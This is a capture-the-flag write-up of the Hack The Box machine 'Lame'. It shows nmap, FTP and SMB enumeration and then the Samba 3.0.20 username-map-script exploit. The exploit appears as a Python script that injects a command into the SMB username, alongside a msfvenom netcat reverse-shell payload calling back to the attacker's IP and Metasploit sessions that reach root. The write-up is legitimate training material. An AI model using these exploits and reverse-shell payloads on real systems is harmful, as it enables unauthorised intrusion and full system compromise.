HTB - Lame
The given box Lame is a Linux machine with an IP address of 10.10.10.3
Recon
Nmap Scan Result
On performing a nmap scan on the target, we can see there are 4 standard ports open
1. ftp - 21
2. ssh - 22
3. netbios-ssn - 139
4. smb - 445
And also it discovered that the machine is running Debian Ubuntu OS
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ sudo nmap -sC -sV -A 10.10.10.3
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-15 10:45 IST
Nmap scan report for 10.10.10.3
Host is up (0.25s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.8
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: DD-WRT v24-sp1 (Linux 2.4.36) (92%), OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Arris TG862G/CT cable modem (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h06m38s, deviation: 2h49m43s, median: 6m37s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-09-15T01:22:15-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 248.84 ms 10.10.14.1
2 248.92 ms 10.10.10.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.88 seconds
Enumeration
FTP anonymous login
Since anonymous login is enabled, we can login into FTP without password and view its contents
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:aidenpearce369): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp>
There is no useful information in FTP directory
SMB enumeration with smbmap
There is a SMB port open in 445, so lets enumerate for open shares in SMB
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
There is a share named tmp where we can read & write
SMB enumeration with smbclient
We got an open share named tmp, lets try to enumerate this share with smbclient
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ smbclient -N //10.10.10.3/tmp
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
It shows protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED, which means our smbclient is not ready to lower its protocol inorder to connect with the machine’s SMB share
We have to force our smbclient to lower its protocol to connect with Samba v1 (SMB1)
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ smbclient -N //10.10.10.3/tmp --option="client min protocol = NT1"
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 15 11:04:34 2021
.. DR 0 Sat Oct 31 12:03:58 2020
.ICE-unix DH 0 Wed Sep 15 10:50:26 2021
vmware-root DR 0 Wed Sep 15 10:50:49 2021
.X11-unix DH 0 Wed Sep 15 10:50:51 2021
.X0-lock HR 11 Wed Sep 15 10:50:51 2021
5562.jsvc_up R 0 Wed Sep 15 10:51:29 2021
vgauthsvclog.txt.0 R 1600 Wed Sep 15 10:50:24 2021
7282168 blocks of size 1024. 5386528 blocks available
smb: \>
There is no useful information from SMB shares
Finding Suitable Exploits With Searchsploit
After enumerating all protocols, we are empty handed
So its better to find an exploit for the protocols with the specific version number of the service
FTP - VSFTPD 2.3.4 exploit
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ searchsploit vsftpd 2.3.4
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
So there is a possible backdoor command execution in FTP protocol
It is also a popular exploit when it comes to FTP Exploitation
Samba 3.0.20 exploit
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ searchsploit samba | grep 3.0.20
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Here we have 2 possible exploits, but we don’t want to overflow the SMB
We need a RCE, so we go for 'Username' map script' Command Execution to exploit this version of SMB
Gaining Access
VSFTPD 2.3.4 manual exploit
This is a simple exploit that is being triggered with :) (Not smiley)
For more reference on this exploit
Manual exploit python script
Trying manually without scripts,
┌──(aidenpearce369㉿aidenpearce369)-[~/HTB/Lame]
└─$ nc 10.10.10.3 21
220 (vsFTPd 2.3.4)
USER monish:)
331 Please specify the password.
PASS hackme
500 OOPS: priv_sock_get_result
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ nc 10.10.10.3 6200
(UNKNOWN) [10.10.10.3] 6200 (?) : Connection timed out
No luck
Trying with scripts,
┌──(aidenpearce369㉿aidenpearce369)-[~/HTB/Lame]
└─$ python3 vsftpd.py
Usage: ./vsftpd_234_exploit.py <IP address> <port> <command>
Example: ./vsftpd_234_exploit.py 192.168.1.10 21 whoami
┌──(aidenpearce369㉿aidenpearce369)-[~/HTB/Lame]
└─$ python3 vsftpd.py 10.10.10.3 21 whoami
[*] Attempting to trigger backdoor...
[+] Triggered backdoor
[*] Attempting to connect to backdoor...
[!] Failed to connect to backdoor on 10.10.10.3:6200
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ nc 10.10.10.3 6200
(UNKNOWN) [10.10.10.3] 6200 (?) : Connection timed out
After googling, it is mentioned that this exploit will work damn sure if the version number is correct
But the problem in spawning reverse shell connection is due to firewall/iptables which doesn’t let the outbound connection on port 6200
VSFTPD 2.3.4 metasploit exploit
There is already an exploit for this vulnerability in metasploit, lets try to use this one
msf6 > search vsftpd2.3.4
[-] No results from search
msf6 > search vsftpd 2.3.4
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
Same bad luck, this exploit was completed but it could not get the reverse shell from inside of the machine
Samba 3.0.20 manual exploit
From the 'Username' map script' Command Execution exploit, we can clearly see that this exploit is being triggered by nohup
The nohup command executes another program specified as its argument and ignores all SIGHUP (hangup) signals. SIGHUP is a signal that is sent to a process when its controlling terminal is closed
This exploit requires no authentication on SMB and it uses username to pass payloads via nohup in it
The exploit section in ruby will be like ,
def exploit
connect
# lol?
username = "/=`nohup " + payload.encoded + "`"
begin
simple.client.negotiate(false)
simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
rescue ::Timeout::Error, XCEPT::LoginError
# nothing, it either worked or it didn't ;)
end
handler
end
Searching for a short and sweet exploit, I found this
The manual exploit for Samba 3.0.20 will be like,
#!/usr/bin/python
from smb.SMBConnection import SMBConnection
import random, string
from smb import smb_structs
smb_structs.SUPPORT_SMB2 = False
import sys
# Just a python version of a very simple Samba exploit.
# It doesn't have to be pretty because the shellcode is executed
# in the username field.
# Based off this Metasploit module - https://www.exploit-db.com/exploits/16320/
# Configured SMB connection options with info from here:
# https://pythonhosted.org/pysmb/api/smb_SMBConnection.html
# Use the commandline argument as the target:
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <HOST>\n"
sys.exit()
# Shellcode:
# msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python
buf = ""
buf += "FILL PAYLOAD HERE"
buf += "FILL PAYLOAD HERE"
buf += "FILL PAYLOAD HERE"
buf += "FILL PAYLOAD HERE"
buf += "FILL PAYLOAD HERE"
buf += "FILL PAYLOAD HERE"
buf += "FILL PAYLOAD HERE"
buf += "FILL PAYLOAD HERE"
username = "/=`nohup " + buf + "`"
password = ""
conn = SMBConnection(username, password, "SOMEBODYHACKINGYOU" , "METASPLOITABLE", use_ntlm_v2 = False)
assert conn.connect(sys.argv[1], 445)
We have to generate our shellcode using msfvenom which will be our payload in the exploit script to trigger a reverse shell
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.8 LPORT=6789 -f python
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 88 bytes
Final size of python file: 440 bytes
buf = b""
buf += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6c"
buf += b"\x63\x6f\x69\x3b\x20\x6e\x63\x20\x31\x30\x2e\x31\x30"
buf += b"\x2e\x31\x34\x2e\x38\x20\x36\x37\x38\x39\x20\x30\x3c"
buf += b"\x2f\x74\x6d\x70\x2f\x6c\x63\x6f\x69\x20\x7c\x20\x2f"
buf += b"\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70\x2f"
buf += b"\x6c\x63\x6f\x69\x20\x32\x3e\x26\x31\x3b\x20\x72\x6d"
buf += b"\x20\x2f\x74\x6d\x70\x2f\x6c\x63\x6f\x69"
Copy this shellcode in the exploit script and start running it with netcat listener to get the reverse shell
┌──(aidenpearce369㉿aidenpearce369)-[~/HTB/Lame]
└─$ python samba.py 10.10.10.3
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ nc -nlvp 6789 1 ⨯
listening on [any] 6789 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.3] 54632
id
uid=0(root) gid=0(root)
whoami
root
ls /home/
ftp
makis
service
user
cat /home/makis/user.txt
<---USER FLAG--->
cat /root/root.txt
<---ROOT FLAG--->
Samba 3.0.20 metasploit exploit
Lets use the metasploit exploit for Samba 3.0.20 by simply configuring the remote and listener
msf6 > search samba 3.0.20
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.88 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.8
LHOST => 10.10.14.8
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Command shell session 1 opened (10.10.14.8:4444 -> 10.10.10.3:58270) at 2021-09-15 12:03:55 +0530
id
uid=0(root) gid=0(root)
whoami
root
cat /home/makis/user.txt
<---USER FLAG--->
cat /root/root.txt
<---ROOT FLAG--->
It is way more simple than using manual exploit, because frameworks are always meant to automate our work